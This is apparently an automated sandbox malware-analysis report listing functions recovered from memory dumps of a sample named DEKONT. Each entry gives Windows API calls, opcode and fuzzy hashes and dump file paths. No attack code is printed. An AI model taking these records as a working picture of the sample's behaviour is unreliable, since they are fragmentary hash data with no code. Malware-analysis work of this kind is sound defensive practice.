Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 962420cd280d335b244a79a3154e836e09af596ee8fe2af95b3eae572f003894
Instruction ID: bee9b146e582c200f48c7f753e6179d0011d1aea9fd73ccfc3f4030307b2fc0a
Opcode Fuzzy Hash: 962420cd280d335b244a79a3154e836e09af596ee8fe2af95b3eae572f003894
Instruction Fuzzy Hash: D021E3B5D00259EFDB10CFAAD884ADEBBF5FB48310F14841AE918A3350D374A951CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05B28D94 Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 05B28ED6

Memory Dump Source

Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8498332cf74ec1b479657725a0e26bfb11508f063534ac7eed6a083668857336
Instruction ID: 7173016dd0dc42b5d545444037c52ff9f9dcd36007738264ee4af114c973be7d
Opcode Fuzzy Hash: 8498332cf74ec1b479657725a0e26bfb11508f063534ac7eed6a083668857336
Instruction Fuzzy Hash: 44112974E042299FDB14DBA8D484EADB7F6FB88304F1481A5F808E7346D771AC42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 06D0D5B8 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06D0D439,00000800,00000000,00000000), ref: 06D0D62A

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 36e340253683b06e0ef097b89e9a4ecd92b8ab69b7a82d72b0d3a6087d62cc13
Instruction ID: e99fb5b1e01f69af623e898eb14dce17fee8a68453afb63848c61816a218094c
Opcode Fuzzy Hash: 36e340253683b06e0ef097b89e9a4ecd92b8ab69b7a82d72b0d3a6087d62cc13
Instruction Fuzzy Hash: 5A1112B6C003099FDB14CFAAC884BDEFBF9AF88310F10852AD519A7240C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D0C148 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06D0D439,00000800,00000000,00000000), ref: 06D0D62A

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1b8d6704501bff9308760b91d9d9dde3e67e5d511c346286ce30b158758f7a1b
Instruction ID: 01304ae4fa7d3f32752f9d51ef4dd16faad5bd8db4e34595b4f4be1d18d35d42
Opcode Fuzzy Hash: 1b8d6704501bff9308760b91d9d9dde3e67e5d511c346286ce30b158758f7a1b
Instruction Fuzzy Hash: 2C1103B6D003099FDB10DF9AC844B9EFBF5EB88310F50842AE919A7240C375A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06D0C100 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06D0D184), ref: 06D0D3BE

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d948330567c5051f59ff2100c5c071fe560712268b5874926d6bb83b3b6f1b9c
Instruction ID: 450210dd80782a7b551b19994be16a23dfff10d956b1edfe0618c720f3eb1230
Opcode Fuzzy Hash: d948330567c5051f59ff2100c5c071fe560712268b5874926d6bb83b3b6f1b9c
Instruction Fuzzy Hash: F4110FB6C003498FDB24DF9AD844BDEFBF5EF88224F14842AD819A7640C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DCFDA8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

-)1#, xrefs: 02DCFDC6

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID: -)1#
API String ID: 0-1789991113
Opcode ID: a7a2af704e817621a6a19bd57f85d89576952907efc0889d9fb8d7b2856cecbb
Instruction ID: 487a471772b34ad21eaa4b3d5f8b505ce56e6797f8fe97857a3e2c99361274fc
Opcode Fuzzy Hash: a7a2af704e817621a6a19bd57f85d89576952907efc0889d9fb8d7b2856cecbb
Instruction Fuzzy Hash: E3216171A0120BCFDB14EBA8D1156DEBBB6AB48704F30442EC816B7B51CB759D44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DC7850 Relevance: .7, Instructions: 690COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a2f83640ab4dd81cb32341e90fdb371ae0a3f796cc63e900e0e42760963c4b
Instruction ID: d6b3e94d1739fa1b6a65908dc413d697ecf5acd0e217364da45fc0867413dfab
Opcode Fuzzy Hash: 31a2f83640ab4dd81cb32341e90fdb371ae0a3f796cc63e900e0e42760963c4b
Instruction Fuzzy Hash: 92520E74A00219CFEB15DBA5C864B9EBB72FF98700F1081AAC10AAB364DF355D85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 02DC21B4 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2f0a5c0384a4927ae463e3f1681007177e9d71719cefdc1257edcbf474ced5
Instruction ID: 071046513c0d588217d9cdcdeb18389597cf6b010fa82f27d049c568d71df8c7
Opcode Fuzzy Hash: 7b2f0a5c0384a4927ae463e3f1681007177e9d71719cefdc1257edcbf474ced5
Instruction Fuzzy Hash: 32029C35810A6A8FCB014FB8C968299F770FFAF310F25C9E9D8495E206EF715986C754

Uniqueness

Uniqueness Score: -1.00%

Function 02DC6EB8 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122fd6bc95d3ad04ad169ab5b5168243e4fb837312d4bee8a3c50d2a18ebd5e1
Instruction ID: ae4a786778baf49dd3ed393eb1fbd513e10159a811c13b4fbc4df6094ddd9aa7
Opcode Fuzzy Hash: 122fd6bc95d3ad04ad169ab5b5168243e4fb837312d4bee8a3c50d2a18ebd5e1
Instruction Fuzzy Hash: 27123830A0020A9FDB15CFA9D984A9EFBF6BF88314F248559E8559B365D730ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC0C8F Relevance: .4, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1cf2530c61d0f1aff685dc10949b346fb3c42cd99f3991e6665f99b39f0de2
Instruction ID: 7698e3711ad5b31242dd65a544ac5050172cf10b88158609a2a90a8ca052c4bb
Opcode Fuzzy Hash: bf1cf2530c61d0f1aff685dc10949b346fb3c42cd99f3991e6665f99b39f0de2
Instruction Fuzzy Hash: F922D778A0121DCFCB55EF64E898A9DBBB2FF88301F1085A6D909AB358DB305D55CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02DC0CA0 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 596a90780c603d37ff961143b16242f17d473b8963cb35e6b78fdbd663d23f2d
Instruction ID: 2474e58d18da5eeab1dbc03051af939bfb9bfdc9de564ded27bf63567b7058ca
Opcode Fuzzy Hash: 596a90780c603d37ff961143b16242f17d473b8963cb35e6b78fdbd663d23f2d
Instruction Fuzzy Hash: 2222D738A0121DCFCB55EF64E998A9DBBB2FF88301F1085A6D909AB358DB305D55CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02DCA878 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0860465b98e4136651739c731eb7218ca0ad04357df8060d3f7957fd9617f8f
Instruction ID: 6ac29d159a43c517183bc84b097a76219dbfcc0d14b21014bf227a7927dfd769
Opcode Fuzzy Hash: e0860465b98e4136651739c731eb7218ca0ad04357df8060d3f7957fd9617f8f
Instruction Fuzzy Hash: FBF12D75A0061ACFCB05CFA9D584AADBBF6FF88314B268059E419EB361CB35EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC8849 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13d3734c2237708501516673a5204927a315a29df2e8d9c00096930b9d7a1d06
Instruction ID: e6024dc575842dd56267741089b1b2daf1ee38f68394abdbc3845d3273782c25
Opcode Fuzzy Hash: 13d3734c2237708501516673a5204927a315a29df2e8d9c00096930b9d7a1d06
Instruction Fuzzy Hash: 8CB160707052038FDB1B9E29CA58F3976AAEF85644F24446EE542CF3A1EF29CC42E751

Uniqueness

Uniqueness Score: -1.00%

Function 02DC5700 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f026d83683d6986d0804d34d652fe2998ce41c4455386145eccb7fddc574070
Instruction ID: f2b95e67b383e2ce341935dc8bb9e6910278b696dd6d91d4db65735e990d69e8
Opcode Fuzzy Hash: 3f026d83683d6986d0804d34d652fe2998ce41c4455386145eccb7fddc574070
Instruction Fuzzy Hash: 05B1F0307042168FDB268F35E894B2E7BA6AF88354F64896DE446DB390DF74EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06CE2830 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6ca59b5b5eb3df66ac72020b12af18cb0686039b28132d5964e3003bbd49983
Instruction ID: f7bc3b2223d7a84cb9cbe32b76ac56504b2829f9c01422f1695b7e014156215f
Opcode Fuzzy Hash: d6ca59b5b5eb3df66ac72020b12af18cb0686039b28132d5964e3003bbd49983
Instruction Fuzzy Hash: 16819F71B001068FDB58DF79C454A6E77BAFF88A00B1585AED406DB3A1DB35EE02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02DC5C60 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8f9f02965bf52761015519e251e281bf92a8557e24f8848acb728db6b6b2c0
Instruction ID: b7d08a7c3405d8c466969e6024d8b3521ff3b4d4c94f194874a6f56ede38d1f1
Opcode Fuzzy Hash: dc8f9f02965bf52761015519e251e281bf92a8557e24f8848acb728db6b6b2c0
Instruction Fuzzy Hash: DE818F74A00206CFCB14DF69E888AAAB7B6FF89204BA4816DD415FB365D731FC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9960 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b85f01a46419e141ec295c75de6b3195748c0e2bf87be657fb5b0f7dce7913a
Instruction ID: 938db7da8c79179c3d27b3579c02b250d644ad27baef54936f97470795bfa925
Opcode Fuzzy Hash: 9b85f01a46419e141ec295c75de6b3195748c0e2bf87be657fb5b0f7dce7913a
Instruction Fuzzy Hash: A1719271F002199BDB55DFA9D8506AEBBB2AFC8700F148529E406BB380DF34AD05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DC7498 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64fd9aa629c497df35899833faaabac9a62d201921364a75ce985b11f2370cec
Instruction ID: 1f79601aed2a501b6d079f607acc12d49295c4fe9812425f938c94e729e8497c
Opcode Fuzzy Hash: 64fd9aa629c497df35899833faaabac9a62d201921364a75ce985b11f2370cec
Instruction Fuzzy Hash: 02712B347402468FDB55DF29C898AADBBEAAF49344F2544A9E906CB3B1DB70DC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06CE15E9 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c382e29d2a8ec7497bdda52d516744f2a9dcf1d6f6865bf444dc51896e52242b
Instruction ID: 1ea5ff04d4c56697657773fa327048fda8ddecd9f2d5518a1b111d1e9a0df462
Opcode Fuzzy Hash: c382e29d2a8ec7497bdda52d516744f2a9dcf1d6f6865bf444dc51896e52242b
Instruction Fuzzy Hash: 5B81A274E412298FDB65DF65D894BEDBBB2BF89300F1484EAD849A7250DB305E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 02DCD3C2 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a823dc7b1b4cdf9ce4c79cf6dbaddebf752c30e5a766b8576e5c3aa2dc5a2670
Instruction ID: 0b8680fce5ce3331abfaa7daa0e7ecf431ff94e76ae16097bd98542e9c144203
Opcode Fuzzy Hash: a823dc7b1b4cdf9ce4c79cf6dbaddebf752c30e5a766b8576e5c3aa2dc5a2670
Instruction Fuzzy Hash: BB51B5788A124F8FD7562B30B5FC5AABBA5FB0F3AB7156D10A10E898169B344064CF12

Uniqueness

Uniqueness Score: -1.00%

Function 02DCD3D0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a48774f3253a108d34feb32f254a7dc48251e162d745f646684874b79d2d82c
Instruction ID: 1a549a958d2e243f2f0d5c829c9d60119d8a6bc92cb4fe8386847cca204dfe5f
Opcode Fuzzy Hash: 9a48774f3253a108d34feb32f254a7dc48251e162d745f646684874b79d2d82c
Instruction Fuzzy Hash: 7E51A4788A134F8F97163F30B5FC56ABBA5FB0F7AB7556D10A11E8981A9B304064CF12

Uniqueness

Uniqueness Score: -1.00%

Function 02DCD719 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f95c2dae0d34f53a70f08a38a4d7d09e3b2619d3fabab481ec8d11ff4852e4
Instruction ID: d0c97a89510c835aeeeb42faebf27af82f47063fa9467835aa2a2c36cd4e4879
Opcode Fuzzy Hash: 16f95c2dae0d34f53a70f08a38a4d7d09e3b2619d3fabab481ec8d11ff4852e4
Instruction Fuzzy Hash: 9E51D474E012099FDB04DFA9D994A9DBBF2FF89301F649129D405BB354DB349C42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02DCE7B9 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74acdbaba411f63ca4a5f19c37c7d7a5c324107fbae18e70f0124bd05ae3ded
Instruction ID: ab6e94e964f5e12bf603e43c2afd342893c4d2201e2ce69df09f140d6215d783
Opcode Fuzzy Hash: a74acdbaba411f63ca4a5f19c37c7d7a5c324107fbae18e70f0124bd05ae3ded
Instruction Fuzzy Hash: EC51FD74E01318CFEB15DFA5D898AAEBBB2FF88301F608129D805AB395DB356945DF40

Uniqueness

Uniqueness Score: -1.00%

Function 02DCCD70 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07244976fb73e55a3b92aa8f68bcf2e9426240b10eba378f18716fe62113471
Instruction ID: f86c067911041f7943cd71f17f413e9b913c4ed04a348a95e4cef25ce3478f6f
Opcode Fuzzy Hash: a07244976fb73e55a3b92aa8f68bcf2e9426240b10eba378f18716fe62113471
Instruction Fuzzy Hash: 4751A674E01208DFDB44DFAAD89499DBBF2FF89300F24816AE819AB365DB319801CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEE110 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64129942a403d720f2e18bdf78e06413b00320eb56481f5ded0b7f773b079846
Instruction ID: 7200431ddfc60ce8aaa00eae38f30ed3d8a27303606325338d8ef8747d8ff6d6
Opcode Fuzzy Hash: 64129942a403d720f2e18bdf78e06413b00320eb56481f5ded0b7f773b079846
Instruction Fuzzy Hash: AE416D3990120ACFD714AFB1E46C7EEBBF5EB4A74AF005829D2017B295CB781A44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02DC3960 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aceef59e02e0e8b0562084aa76366aea00d90384f22ad4b5d69a3096b15e0ec2
Instruction ID: 19d25e899a9df998899e73ce7273024141bd0fbd342bbebf767be520a9dea93a
Opcode Fuzzy Hash: aceef59e02e0e8b0562084aa76366aea00d90384f22ad4b5d69a3096b15e0ec2
Instruction Fuzzy Hash: 67518F74E01209DFCB48DFA9D59499DBBB2FF89301B209569E809AB364DB31AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC9AC3 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce891d2a0c85ad078341d14cae88a178f74c62afe0e795af7be02e181ebebaf
Instruction ID: 47d2f369bcfd38108d6a4985cbabfc6063ef866125c51efdbc08d835e3e9104c
Opcode Fuzzy Hash: 8ce891d2a0c85ad078341d14cae88a178f74c62afe0e795af7be02e181ebebaf
Instruction Fuzzy Hash: AB415A31A0424ADFCF15CFA5C994BEEBBB2EF49354F108159E8159B355D334E950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02DCA6B0 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04008138ff53b9376b7c4c6108b3580d453b46ec79f0c2d557934ac6dce4915a
Instruction ID: 6452429b2c8390a6ccd272c35f1c309861db171a7dc9521f98dea6ef57a8152b
Opcode Fuzzy Hash: 04008138ff53b9376b7c4c6108b3580d453b46ec79f0c2d557934ac6dce4915a
Instruction Fuzzy Hash: C841C235B002099FDB169F75D8A46AEBBF6BFC9251F24856DD506E7390CE309C02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9952 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3567f8fb4bbb922ac34f1ac54fbdae1d3bd569a98b941dd9e482a62efa3da1e
Instruction ID: c99d70cc790dee4792220ec24a503119f07c7509ea3c390f56945d7044b68b3d
Opcode Fuzzy Hash: a3567f8fb4bbb922ac34f1ac54fbdae1d3bd569a98b941dd9e482a62efa3da1e
Instruction Fuzzy Hash: 96413071E4021ADBDB24DFA5C891ADEBBF5BF88700F248129E415B7350EB70AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9E99 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea0f8250c6d7b59dc4926cf6371fa9813cfeecf08d24fe7cf1efbf891f2ffb13
Instruction ID: 7ef25a81b488bdc3fbfdbd1bdf3c1f4f3a128d33e909b974e1ff0d0da84bff15
Opcode Fuzzy Hash: ea0f8250c6d7b59dc4926cf6371fa9813cfeecf08d24fe7cf1efbf891f2ffb13
Instruction Fuzzy Hash: 3E41CB74E01208CFDB54DFA9D5947EDBBB2BB49301F20952AE805BB294DB386A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC6790 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4e920ecdb18b01e1d61e1b30b074f72304155cbc50393d014cb0abf35792088
Instruction ID: 0ef2f2d01dd9cc03428e7ab7d79c22479eb02370d017b88b7fdd5b4968b65dfb
Opcode Fuzzy Hash: c4e920ecdb18b01e1d61e1b30b074f72304155cbc50393d014cb0abf35792088
Instruction Fuzzy Hash: 9541CE30A0420ADFDF118F64C954BAABBBAEF84300F14842EE80597391DB74DD55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DC3480 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d554d6cc60979e014db18d15c6390cfef00eb2ce5cda17a9168aa74b4c72939
Instruction ID: 6e07d75ca780999f05702d472d2d427b51ab7302ca18e982e5ff10bc884e1309
Opcode Fuzzy Hash: 0d554d6cc60979e014db18d15c6390cfef00eb2ce5cda17a9168aa74b4c72939
Instruction Fuzzy Hash: 2331E731B143268BDF995AB6989437EB6AAABC4255F38847ED806D3380DF75CC04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9EA8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 211811137cba8bc71bec79f486fa802b73c1e508a11ec6a8b871eadca4cfff8a
Instruction ID: 95010c9dd8105c4969f614ad1a5ef1633d9993285b65993f8901d9395ee00e62
Opcode Fuzzy Hash: 211811137cba8bc71bec79f486fa802b73c1e508a11ec6a8b871eadca4cfff8a
Instruction Fuzzy Hash: 9241BB74E01208CFDB54DFA9D5946EDBBF2AB89301F10942AE405A7294DB386A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC4E20 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf61bfd7185222b3c6a1b8b124f45f696ca0ed7df16fe2924881d24a7b9f99b
Instruction ID: 7628864711f0d6e8f02908519e3c7298b6c7c874de6991b0d48dc2b26934dd0a
Opcode Fuzzy Hash: fdf61bfd7185222b3c6a1b8b124f45f696ca0ed7df16fe2924881d24a7b9f99b
Instruction Fuzzy Hash: 5831B2B560410AAFCF03AF65D464AAF7BA7FF88251F104429FA058B354CB34CC21CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CEE10B Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

